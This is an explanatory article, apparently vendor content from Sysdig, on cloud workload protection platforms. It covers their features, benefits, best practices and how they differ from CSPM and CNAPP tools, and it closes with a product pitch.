What is a Cloud Workload Protection Platform (CWPP)?

Introduction to CWPP

A cloud workload refers to the computing resources and tasks that are required to run an application or service in a cloud computing environment. Cloud workloads are often run on virtual machines provided by cloud hosting companies, but they can also be run in containers, as part of a microservices-based architecture, and as serverless functions that run in managed environments. Many businesses choose to run different workloads in different cloud hosts to optimize performance and costs.

Cloud workloads can refer to anything that runs in the cloud, for example:

• Static workloads such as databases that are always online as part of an application backend.
• Short-lived, ephemeral workloads that execute actions such as generating PDFs and sending emails, and are only executed when called.
• Scheduled processes that run periodically, such as processing batches of tasks or cleaning up data at regular intervals.

A cloud workload protection platform protects workloads by actively scanning them for vulnerabilities prior to deployment, and by providing ongoing runtime protection to address emerging threats.

Why is cloud workload protection important?

As cloud workloads often have access to sensitive or proprietary data, and may be connected to other critical IT infrastructure, strong security measures should be taken to secure them.

Due to the highly varied nature of cloud-native applications, a CWPP must be able to protect workloads running in public cloud-hosted containers, Kubernetes, virtual machines, and serverless functions. These may span different cloud providers, as well as on-premises infrastructure in hybrid hosting environments.

How does CWPP work?

A CWPP provides visibility and inventory tools for cataloging workloads, and information on where and when they are running, so that security teams are fully aware of what they are responsible for.

Once the security landscape is understood, a CWPP provides end-to-end coverage of cloud workloads with:

• Vulnerability management: CWPPs can scan the code and configuration used in workloads for known vulnerabilities, including those in software dependencies.
• Runtime protection: Running processes are scanned for the signs of an attack-in-progress. This helps protect against zero-day exploits and attacks targeted against your specific workloads and code by monitoring for suspicious behavior in your workloads.
• Auditing and reporting: Detailed logging provides historical insights and can be used to identify suspicious activity and data misuse retroactively so that the relevant parties can be notified, and action can be taken.

Cloud workload protection takes place inside the execution environment, rather than monitoring the cloud platform itself. 

CWPP features

Different CWPP products provide their own specific features. When choosing a CWPP to protect your cloud workloads, assess if you require the following:

• Integration with your existing tools and platforms: CI/CD integration ensures that you can identify known vulnerabilities at the build stage, so they do not make it to production.
• Automation: Automated detection and response drastically shortens the window an attacker has to fully exploit a successful intrusion, and gives your security team time to respond to complex attacks in progress.
• Policy enforcement: Security policies should ensure strong security posture and prevent account compromise and other malicious activities.
• Compliance monitoring: GDPR, CCPA, and other legal frameworks enforce the protection of users’ personally identifiable information (PII). If you handle this kind of data, your CWPP should actively monitor for breaches, so that stakeholders can be informed, and costly violations can be avoided.
• Firewall and segmentation: If you have a complex deployment, your CWPP should assist in isolating cloud workloads from sensitive resources. Implementing firewalls reduces the ability for attackers to move laterally through your network.
• Agentless scanning: Removing the need to install CWPP agents for each workload makes deployment and maintenance simpler, while also improving scalability.

CWPP benefits

Vulnerabilities are often introduced to your environment through third party packages. By injecting malicious code into cloud workload processes, attackers can take over and exploit your cloud resources — at your cost. By protecting your workloads with a CWPP you can prevent them from being exploited, or prevent them from becoming a stepping stone to your other cloud and on-premises infrastructure.

Visibility and reporting means that stakeholders are aware of the security risks that static and dynamic workloads present, and are alerted when suspicious activity is detected.

Legal compliance is also addressed, as CWPPs help protect sensitive data, and alert security teams of potential unauthorized access or leaks so that the attack vector can be closed, and affected parties can be notified. This is important with the growing number of data protection laws worldwide, and the legal and reputational damage organizations that fall victim to data breaches suffer.

Combining traditional cybersecurity products to try to provide full cloud coverage is impractical: the complexity and uniqueness of cloud workloads and the infrastructure they run on require security processes and technologies designed for the cloud so that no gaps are left.

CWPP vs. CSPM

Cloud security posture management (CSPM) plays a critical role in cloud native environments.

While a CWPP provides protection within running workloads, a CSPM provides overall oversight and protection of your native cloud infrastructure. A CSPM scans for misconfigurations of the cloud platforms that workloads run on, checks security policies and permissions, and identifies risks specific to cloud environments such as AWS, Google Cloud, and Azure. CSPM tools are typically more preventive in nature, ensuring secure cloud configurations, while CWPP tools offer a mix of prevention and detection for workloads.

CWPP vs. CNAPP

A cloud native application protection platform (CNAPP) differs from a CWPP in both role and scope: a CNAPP integrates multiple cloud security technologies into a unified platform, often including CWPP and CSPM features.

Cloud workload protection best practices

In addition to deploying a security solution that provides CWPP features, there are several policies and procedures you should enact to protect your cloud workloads:

• Make security a priority during development: In addition to integrating vulnerability scanning in your CI/CD pipelines, perform code reviews and static/dynamic code analysis with a focus on reducing the potential attack vectors exposed by your workloads.
• Regularly review and update security policies: A CWPP can assist in enforcing security policies, but it cannot understand their implications. Make sure you review them regularly.
• Routinely run and revise incident response drills: Time is of the essence when responding to cybersecurity incidents. You should run regular drills to ensure that your CWPP is being leveraged to its full effect, and that there are no gaps in visibility or your response plan. This helps you fully assess the impact of a security incident and take remediation steps in a timely manner.

A CWPP is only effective if you pay attention to it. You should also regularly check your CWPP for alerts, including new vulnerabilities, configuration drift, and attempted permissions escalations or access attempts.

Full cloud workload protection

In production, workloads must be monitored and protected from both inside their execution environment, and from the outside, including the cloud infrastructure and configuration that host them. A standalone cloud workload protection platform does not provide comprehensive coverage for cloud native environments, and must be combined with security posture management solutions and other integrations for complete visibility and proactive detection and response.

Many organizations are moving towards full end-to-end protection with a CNAPP that combines the features of both a CWPP and CSPM solution. Sysdig provides a complete cloud security platform that hardens your applications to close attack vectors, as well as monitors the execution of workloads for automatic response and remediation. Sysdig provides unique visibility of containers and Kubernetes, giving users the context they need to identify the most impactful vulnerabilities and detect workload threats instantly.